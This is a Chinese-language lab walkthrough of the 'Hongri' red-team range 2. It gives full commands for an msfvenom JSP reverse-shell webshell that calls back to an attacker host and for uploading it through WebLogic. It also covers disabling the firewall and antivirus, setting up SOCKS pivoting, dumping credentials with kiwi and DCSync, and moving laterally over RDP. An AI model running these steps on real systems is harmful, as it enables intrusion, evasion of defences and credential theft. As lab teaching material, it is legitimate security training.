ATT&CK红队评估(红日靶场二)
字数 1573 2025-08-12 11:34:19

ATT&CK红队评估(红日靶场二)渗透测试教学文档

一、靶场环境搭建

1.1 网络拓扑结构

  • WEB主机

    • 两张网卡:
      • 第一张:NAT模式
      • 第二张:仅主机模式(vmnet15)
    • 默认登录:administrator(首次无密码,登录后需设置)

  • DC主机

    • 一张网卡:仅主机模式(vmnet15)
    • 默认密码:1qaz@WSX

  • PC主机

    • 两张网卡:
      • 第一张:NAT模式
      • 第二张:仅主机模式(vmnet15)
    • 默认密码:1qaz@WSX

1.2 IP地址分配

  • DC: delay\delay 10.10.10.10
  • PC: delay\mssql 10.10.10.201 192.168.111.201
  • WEB: delay\Administrator 10.10.10.80 192.168.111.80
  • Kali: 192.168.111.136

1.3 服务配置

WEB主机需要启动WebLogic服务:

C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理员身份运行strartWebLogic.cmd

二、信息收集阶段

2.1 初始扫描

使用nmap进行扫描:

nmap -sS -sV -Pn -T4 192.168.111.80

参数说明:

  • -sS:半开式SYN扫描(减少日志记录)
  • -sV:服务版本探测
  • -Pn:穿透防火墙扫描
  • -T4:扫描速度等级(0-5,数字越大越快)

2.2 端口分析

  • 445端口:SMB服务(可能存在MS17-010永恒之蓝漏洞)
  • 7001端口:WebLogic服务(可能存在反序列化、SSRF、任意文件上传等漏洞)
  • 139端口:Samba服务(可能存在爆破/未授权访问/远程命令执行漏洞)
  • 1433端口:MSSQL服务(可能存在爆破/注入/SA弱口令)
  • 3389端口:远程桌面服务

2.3 WebLogic漏洞扫描

使用WeblogicScan工具:

python WeblogicScan.py -u 192.168.111.80 -p 7001

可能发现的漏洞:

  • CVE-2017-3506(反序列化)
  • CVE-2019-2725(反序列化)
  • SSRF漏洞
  • 后台路径泄露

三、初始入侵阶段

3.1 生成木马

使用msfvenom生成JSP木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.136 LPORT=4444 -f jsp > /root/test.jsp

3.2 木马上传路径选择

  1. 控制台images目录:

    \Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
访问URL: http://192.168.111.80:7001/console/framework/skins/wlsconsole/images/shell.jsp

  2. uddiexplorer目录:

    \Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp
访问URL: http://192.168.111.80:7001/uddiexplorer/shell.jsp

  3. 应用安装目录:

    \Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp
访问URL: http://192.168.111.80:7001/项目名/shell.jsp

3.3 建立监听会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.111.136
set LPORT 4444
exploit

四、权限提升与后渗透

4.1 提权尝试

  • getsystem提权失败(可能因杀软/防火墙)
  • 查看补丁:chcp 65001解决乱码问题
  • 查看进程:ps(发现360安全软件)
  • 进程迁移:migrate 512(迁移到services.exe获取SYSTEM权限)

4.2 关闭防护

netsh advfirewall set allprofiles state off  # 关闭防火墙
run killav  # 关闭杀软

4.3 内网信息收集

run post/windows/gather/enum_domain  # 查看域控
run post/windows/gather/enum_ad_computers  # 查看域内成员

4.4 路由设置

run post/multi/manage/autoroute  # 新建路由
run autoroute -p  # 查看路由
background  # 挂起会话

五、内网横向移动

5.1 建立代理

use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 4a
exploit

修改proxychains配置:

vim /etc/proxychains4.conf

5.2 内网扫描

use post/windows/gather/arp_scanner
proxychains nmap -sT -Pn -sV 10.10.10.10  # 扫描域控
proxychains nmap -sT -Pn -sV 10.10.10.201  # 扫描PC主机

5.3 凭证收集

加载kiwi模块(新版替代mimikatz):

load kiwi
help kiwi  # 查看帮助

常用命令:

  • creds_all:列举所有凭据
  • dcsync:通过DCSync检索用户帐户信息
  • lsa_dump_sam:dump出lsa的SAM
  • lsa_dump_secrets:dump出lsa的密文

5.4 横向移动

使用收集的凭证进行RDP连接:

rdesktop 192.168.111.80

通过WEB主机作为跳板连接其他内网主机。

六、关键知识点总结

  1. WebLogic漏洞利用:反序列化漏洞是WebLogic常见高危漏洞,可导致RCE

  2. 权限维持技术

    • 木马文件上传到WebLogic特定目录
    • 进程迁移到系统进程
    • 关闭安全防护措施

  3. 内网渗透技术

    • 路由添加与代理建立
    • 使用proxychains进行内网扫描
    • 凭证收集与横向移动

  4. 规避检测

    • 使用SYN扫描减少日志记录
    • 进程迁移规避杀软检测
    • 使用加密通道进行通信

  5. 域渗透技术

    • DCSync攻击获取域控凭证
    • 黄金票据制作(未演示但相关命令已列出)

本教学文档完整还原了从外网渗透到内网横向移动的全过程,涵盖了信息收集、漏洞利用、权限提升、凭证窃取和横向移动等红队评估关键环节。

ATT&CK红队评估(红日靶场二)渗透测试教学文档 一、靶场环境搭建 1.1 网络拓扑结构 WEB主机 : 两张网卡: 第一张:NAT模式 第二张:仅主机模式(vmnet15) 默认登录:administrator(首次无密码,登录后需设置) DC主机 : 一张网卡:仅主机模式(vmnet15) 默认密码:1qaz@WSX PC主机 : 两张网卡: 第一张:NAT模式 第二张:仅主机模式(vmnet15) 默认密码:1qaz@WSX 1.2 IP地址分配 DC: delay\delay 10.10.10.10 PC: delay\mssql 10.10.10.201 192.168.111.201 WEB: delay\Administrator 10.10.10.80 192.168.111.80 Kali: 192.168.111.136 1.3 服务配置 WEB主机需要启动WebLogic服务: 二、信息收集阶段 2.1 初始扫描 使用nmap进行扫描: 参数说明: -sS :半开式SYN扫描(减少日志记录) -sV :服务版本探测 -Pn :穿透防火墙扫描 -T4 :扫描速度等级(0-5,数字越大越快) 2.2 端口分析 445端口:SMB服务(可能存在MS17-010永恒之蓝漏洞) 7001端口:WebLogic服务(可能存在反序列化、SSRF、任意文件上传等漏洞) 139端口:Samba服务(可能存在爆破/未授权访问/远程命令执行漏洞) 1433端口:MSSQL服务(可能存在爆破/注入/SA弱口令) 3389端口:远程桌面服务 2.3 WebLogic漏洞扫描 使用WeblogicScan工具: 可能发现的漏洞: CVE-2017-3506(反序列化) CVE-2019-2725(反序列化) SSRF漏洞 后台路径泄露 三、初始入侵阶段 3.1 生成木马 使用msfvenom生成JSP木马: 3.2 木马上传路径选择 控制台images目录: uddiexplorer目录: 应用安装目录: 3.3 建立监听会话 四、权限提升与后渗透 4.1 提权尝试 getsystem 提权失败(可能因杀软/防火墙) 查看补丁: chcp 65001 解决乱码问题 查看进程: ps (发现360安全软件) 进程迁移: migrate 512 (迁移到services.exe获取SYSTEM权限) 4.2 关闭防护 4.3 内网信息收集 4.4 路由设置 五、内网横向移动 5.1 建立代理 修改proxychains配置: 5.2 内网扫描 5.3 凭证收集 加载kiwi模块(新版替代mimikatz): 常用命令: creds_all :列举所有凭据 dcsync :通过DCSync检索用户帐户信息 lsa_dump_sam :dump出lsa的SAM lsa_dump_secrets :dump出lsa的密文 5.4 横向移动 使用收集的凭证进行RDP连接: 通过WEB主机作为跳板连接其他内网主机。 六、关键知识点总结 WebLogic漏洞利用 :反序列化漏洞是WebLogic常见高危漏洞,可导致RCE 权限维持技术 : 木马文件上传到WebLogic特定目录 进程迁移到系统进程 关闭安全防护措施 内网渗透技术 : 路由添加与代理建立 使用proxychains进行内网扫描 凭证收集与横向移动 规避检测 : 使用SYN扫描减少日志记录 进程迁移规避杀软检测 使用加密通道进行通信 域渗透技术 : DCSync攻击获取域控凭证 黄金票据制作(未演示但相关命令已列出) 本教学文档完整还原了从外网渗透到内网横向移动的全过程,涵盖了信息收集、漏洞利用、权限提升、凭证窃取和横向移动等红队评估关键环节。